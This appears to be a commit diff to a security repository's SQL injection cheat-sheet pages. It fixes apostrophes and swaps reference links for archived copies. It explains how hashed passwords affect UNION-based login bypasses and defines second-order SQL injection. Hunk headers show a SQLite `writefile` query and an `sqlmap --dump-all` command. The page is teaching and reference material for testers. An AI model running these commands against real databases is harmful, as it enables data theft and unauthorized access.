By 2025, applications almost never store plaintext passwords. Authentication systems instead use a representation of the password (a hash derived by a key-derivation function, often with a salt). That evolution changes the mechanics of some classic SQL injection (SQLi) bypasses: an attacker who injects rows via `UNION` must now supply values that match the stored representation the application expects, not the users raw password.
By 2025, applications almost never store plaintext passwords. Authentication systems instead use a representation of the password (a hash derived by a key-derivation function, often with a salt). That evolution changes the mechanics of some classic SQL injection (SQLi) bypasses: an attacker who injects rows via `UNION` must now supply values that match the stored representation the application expects, not the user's raw password.
Many naïve authentication flows perform these high-level steps:
@@ -385,7 +385,7 @@ In short, the result of the first SQL query is used to build the second SQL quer
## Second Order SQL Injection
Second Order SQL Injection is a subtype of SQL injection where the malicious SQL payload is primarily stored in the application's database and later executed by a different functionality of the same application.
Unlike first-order SQLi, the injection doesnt happen right away. It is **triggered in a separate step**, often in a different part of the application.
Unlike first-order SQLi, the injection doesn't happen right away. It is **triggered in a separate step**, often in a different part of the application.
1. User submits input that is stored (e.g., during registration or profile update).
@@ -584,13 +584,13 @@ Bypass using keywords case insensitive or an equivalent operator.
## References
* [A Novel Technique for SQL Injection in PDOs Prepared Statements - Adam Kues - July 21, 2025](https://slcyber.io/assetnote-security-research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements)
* [A Novel Technique for SQL Injection in PDO's Prepared Statements - Adam Kues - July 21, 2025](https://web.archive.org/web/20251017002820/https://slcyber.io/assetnote-security-research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements/)
* [Analyzing CVE-2018-6376 Joomla!, Second Order SQL Injection - Not So Secure - February 9, 2018](https://web.archive.org/web/20180209143119/https://www.notsosecure.com/analyzing-cve-2018-6376/)
* [Implement a Blind Error-Based SQLMap payload for SQLite - soka - August 24, 2023](https://sokarepo.github.io/web/2023/08/24/implement-blind-sqlite-sqlmap.html)
* [Manual SQL Injection Discovery Tips - Gerben Javado - August 26, 2017](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
* [NetSPI SQL Injection Wiki - NetSPI - December 21, 2017](https://sqlwiki.netspi.com/)
* [PentestMonkey's mySQL injection cheat sheet - @pentestmonkey - August 15, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
* [SQLi Cheatsheet - NetSparker - March 19, 2022](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [SQLi in INSERT worse than SELECT - Mathias Karlsson - February 14, 2017](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
* [Implement a Blind Error-Based SQLMap payload for SQLite - soka - August 24, 2023](https://web.archive.org/web/20250513112724/https://sokarepo.github.io/web/2023/08/24/implement-blind-sqlite-sqlmap.html)
* [Manual SQL Injection Discovery Tips - Gerben Javado - August 26, 2017](https://web.archive.org/web/20170826221724/https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
* [NetSPI SQL Injection Wiki - NetSPI - December 21, 2017](https://web.archive.org/web/20171221044609/https://sqlwiki.netspi.com/)
* [PentestMonkey's mySQL injection cheat sheet - @pentestmonkey - August 15, 2011](https://web.archive.org/web/20260109024910/https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
* [SQLi Cheatsheet - NetSparker - March 19, 2022](https://web.archive.org/web/20220219223426/https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [SQLi in INSERT worse than SELECT - Mathias Karlsson - February 14, 2017](https://web.archive.org/web/20231004093323/https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
* [SQLi Optimization and Obfuscation Techniques - Roberto Salgado - 2013](https://web.archive.org/web/20221005232819/https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf)
* [The SQL Injection Knowledge base - Roberto Salgado - May 29, 2013](https://websec.ca/kb/sql_injection)
* [The SQL Injection Knowledge base - Roberto Salgado - May 29, 2013](https://web.archive.org/web/20260302110304/https://www.websec.ca/kb/sql_injection)

4
SQL Injection/SQLite Injection.md
View File

@@ -150,6 +150,6 @@ SELECT writefile('/path/to/file', column_name) FROM table_name
## References
* [Injecting SQLite database based application - Manish Kishan Tanwar - February 14, 2017](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)
* [SQLite Error Based Injection for Enumeration - Rio Asmara Suryadi - February 6, 2021](https://rioasmara.com/2021/02/06/sqlite-error-based-injection-for-enumeration/)
* [Injecting SQLite database based application - Manish Kishan Tanwar - February 14, 2017](https://web.archive.org/web/20211205031408/https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)
* [SQLite Error Based Injection for Enumeration - Rio Asmara Suryadi - February 6, 2021](https://web.archive.org/web/20210221065923/http://rioasmara.com/2021/02/06/sqlite-error-based-injection-for-enumeration/)
* [SQLite3 Injection Cheat sheet - Nickosaurus Hax - May 31, 2012](https://web.archive.org/web/20131208191957/https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)

4
SQL Injection/SQLmap.md
View File

@@ -345,5 +345,5 @@ sqlmap -d "mysql://user:pass@ip/database" --dump-all
## References
* [#SQLmap protip - @zh4ck - March 10, 2018](https://twitter.com/zh4ck/status/972441560875970560)
* [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper - Mehmet Ince - August 1, 2017](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
* [#SQLmap protip - @zh4ck - March 10, 2018](https://web.archive.org/web/20240827145141/https://twitter.com/zh4ck/status/972441560875970560)
* [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper - Mehmet Ince - August 1, 2017](https://web.archive.org/web/20170802071522/https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)